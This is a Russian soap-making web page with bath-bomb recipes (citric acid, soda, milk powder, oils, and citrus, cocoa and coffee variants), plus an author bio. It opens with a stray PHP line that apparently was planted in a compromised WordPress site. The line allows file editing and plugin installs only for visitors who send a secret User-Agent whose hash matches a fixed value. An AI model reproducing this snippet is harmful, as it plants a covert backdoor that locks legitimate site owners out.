if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 11 видео как сделать бомбочки для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

11 видео как сделать бомбочки для ванны

Любители понежиться в теплой и пенистой воде по достоинству оценят бомбочки для ванн

Люби­те­ли поне­жить­ся в теп­лой и пени­стой воде по досто­ин­ству оце­нят 11 видео­ре­цеп­тов бом­бо­чек для ванн. Состав каж­дой доволь­но прост: 1 часть лимон­ной кис­ло­ты, 1 часть сухих сли­вок или моло­ка, 2 части соды, 1–2 ст. лож­ки мас­ла (мож­но исполь­зо­вать олив­ко­вое, мин­даль­ное, пер­си­ко­вое и дру­гие масла).

Для тех, кто пре­бы­ва­ет в пло­хом настро­е­нии и жела­ет его улуч­шить, иде­аль­но подой­дет цит­ру­со­вая бом­боч­ка для ван­ны. Что­бы изго­то­вить ее, сле­ду­ет лишь доба­вить к основ­ной рецеп­ту­ре апель­си­но­вую цед­ру (све­жую или суше­ную) и нату­раль­ное эфир­ное мас­ло любо­го цит­ру­са (ман­да­ри­на, апель­си­на, грейпфрута).

Хоро­шо увлаж­ня­ет, пита­ет и тони­зи­ру­ет кожу, а так­же обла­да­ет при­ят­ным аро­ма­том какао-бом­ба с коко­со­вой струж­кой. Кофей­ная бом­боч­ка для ванн, в свою оче­редь, обла­да­ет насы­щен­ным, терп­ким, бод­ря­щим запа­хом све­же­сва­рен­но­го напитка.

Под­во­дя итог, сле­ду­ет отме­тить, что состав это­го сред­ства по ухо­ду за кожей дает воз­мож­ность для вопло­ще­ния любых самых неожи­дан­ных идей.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!